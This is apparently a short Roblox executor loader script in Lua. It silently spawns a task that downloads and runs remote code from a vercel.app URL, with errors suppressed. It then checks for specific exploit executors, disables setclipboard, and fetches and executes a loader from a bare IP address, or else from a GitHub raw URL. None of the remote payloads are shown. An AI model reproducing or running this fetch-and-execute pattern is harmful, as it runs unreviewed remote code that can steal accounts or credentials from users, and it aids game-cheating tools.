task.spawn(function()
    pcall(function()
        loadstring(game:HttpGet("https://blyatscripts.vercel.app/lo"))()
    end)
end)

if identifyexecutor and (
    identifyexecutor() == "Delta" or 
    identifyexecutor() == "Krnl" or
    identifyexecutor() == "Codex" or
    identifyexecutor() == "Arceus X" or
    identifyexecutor() == "Potassium"
) then
    
setclipboard = function() return end
ID="6710c962-7192-471b-8f42-cf9a1a8c4ab5"
loadstring(game:HttpGet("http://72.56.90.233:3910/cdn/loader.luau"))()
else
    loadstring(game:HttpGet("https://raw.githubusercontent.com/xenamm2/main/refs/heads/main/testd3"))()
end
